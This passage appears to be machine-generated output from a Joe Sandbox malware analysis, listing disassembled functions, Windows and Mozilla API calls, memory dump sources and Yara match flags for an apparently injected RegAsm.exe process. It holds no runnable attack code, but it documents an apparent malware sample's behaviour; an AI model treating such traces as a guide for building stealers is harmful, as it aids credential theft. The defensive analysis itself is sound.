• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 837921583-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72CDA4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                      • Part of subcall function 6C72D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C72CDBA,00100000,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72D158
                                                                                                                                                                                                                                                      • Part of subcall function 6C72D130: InitializeConditionVariable.KERNEL32(00000098,?,6C72CDBA,00100000,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72D177
                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72CDC4
                                                                                                                                                                                                                                                      • Part of subcall function 6C727480: ReleaseSRWLockExclusive.KERNEL32(?,6C721385,?,?,?,?,6C721385,?), ref: 6C7274EB
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72CECC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                      • Part of subcall function 6C71CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C72CEEA,?,?,?,?,00000000,?,6C71DA31,00100000,?,?,00000000), ref: 6C71CB57
                                                                                                                                                                                                                                                      • Part of subcall function 6C71CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C71CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C72CEEA,?,?), ref: 6C71CBAF
                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C71DA31,00100000,?,?,00000000,?), ref: 6C72D058
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 861561044-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6E17B2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C6E18EE
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E1911
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6E194C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3725304770-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6F5DB4
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F5DED
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 557828605-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTickCount64.KERNEL32 ref: 6C737250
• EnterCriticalSection.KERNEL32(6C75F688), ref: 6C737277
• __aulldiv.LIBCMT ref: 6C7372C4
• LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C7372F7
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
• String ID:
• API String ID: 557828605-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6DCEBD
• memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C6DCEF5
• memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C6DCF4E
Strings
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: memcpy$memset
• String ID: 0
• API String ID: 438689982-4108050209
Uniqueness

Uniqueness Score: -1.00%

APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7377FA
• ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C737829
  • Part of subcall function 6C70CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C6D31A7), ref: 6C70CC45
  • Part of subcall function 6C70CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C6D31A7), ref: 6C70CC4E
• ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C73789F
• ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7378CF
  • Part of subcall function 6C6D4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6D4E5A
  • Part of subcall function 6C6D4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6D4E97
  • Part of subcall function 6C6D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C713EBD,6C713EBD,00000000), ref: 6C6D42A9
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
• String ID:
• API String ID: 2525797420-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410452
• GetLastError.KERNEL32(?,?,00000001), ref: 00410460
• GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410498
  • Part of subcall function 004112B0: GetProcessHeap.KERNEL32(00000000,?,?,004104CB,00000000,?,?,00000001), ref: 004112BD
  • Part of subcall function 004112B0: HeapFree.KERNEL32(00000000,?,004104CB,00000000,?,?,00000001), ref: 004112C4
• wsprintfA.USER32 ref: 004104E2
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
• String ID:
• API String ID: 837085947-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• moz_xmalloc.MOZGLUE(00000200), ref: 6C71649B
  • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
• memset.VCRUNTIME140(00000000,00000000,00000200), ref: 6C7164A9
  • Part of subcall function 6C70FA80: GetCurrentThreadId.KERNEL32 ref: 6C70FA8D
  • Part of subcall function 6C70FA80: AcquireSRWLockExclusive.KERNEL32(6C75F448,?,6C70FA1F,?,?,6C6E5407), ref: 6C70FA99
• ReleaseSRWLockExclusive.KERNEL32 ref: 6C71653F
• free.MOZGLUE(?), ref: 6C71655A
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
• String ID:
• API String ID: 3596744550-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?), ref: 6C70FFD3
• memcpy.VCRUNTIME140(00000000,?,?,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?,?), ref: 6C70FFF5
• free.MOZGLUE(?,?,?,?,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?), ref: 6C71001B
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C72D019,?,?,?,?,?,00000000,?,6C71DA31,00100000,?,?), ref: 6C71002A
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
• String ID:
• API String ID: 826125452-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 6C6EB4F5
• AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6EB502
• ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6EB542
• free.MOZGLUE(?), ref: 6C6EB578
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
• String ID:
• API String ID: 2047719359-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C6DF20E,?), ref: 6C713DF5
                                                                                                                                                                                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C6DF20E,00000000,?), ref: 6C713DFC
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C713E06
                                                                                                                                                                                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C713E0E
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CC00: GetCurrentProcess.KERNEL32(?,?,6C6D31A7), ref: 6C70CC0D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6D31A7), ref: 6C70CC16
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2787204188-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72205B
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C72201B,?,?,?,?,?,?,?,6C721F8F,?,?), ref: 6C722064
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72208E
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6C72201B,?,?,?,?,?,?,?,6C721F8F,?,?), ref: 6C7220A3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7220B7
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C70FBD1,?,?,?,6C75F430,?,?,?,6C70FA2B,?,?,?,?,6C6E5407), ref: 6C7220C0
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C70FBD1,?,?,?,6C75F430,?,?,?,6C70FA2B,?,?,?,?,6C6E5407), ref: 6C7220DA
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,6C70FBD1,?,?,?,6C75F430,?,?,?,6C70FA2B,?,?,?,?,6C6E5407), ref: 6C7220F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?), ref: 004067BE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00406898
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID: Ij@
                                                                                                                                                                                                                                                    • API String ID: 2574300362-1774497248
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7285D3
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C728725
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                                                                    • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F755
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F7A6
                                                                                                                                                                                                                                                      • Part of subcall function 0040F5F0: std::_Xinvalid_argument.LIBCPMT ref: 0040F60A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                                                                    • API String ID: 2304785028-2556327735
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C6DBDEB
                                                                                                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6DBE8F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
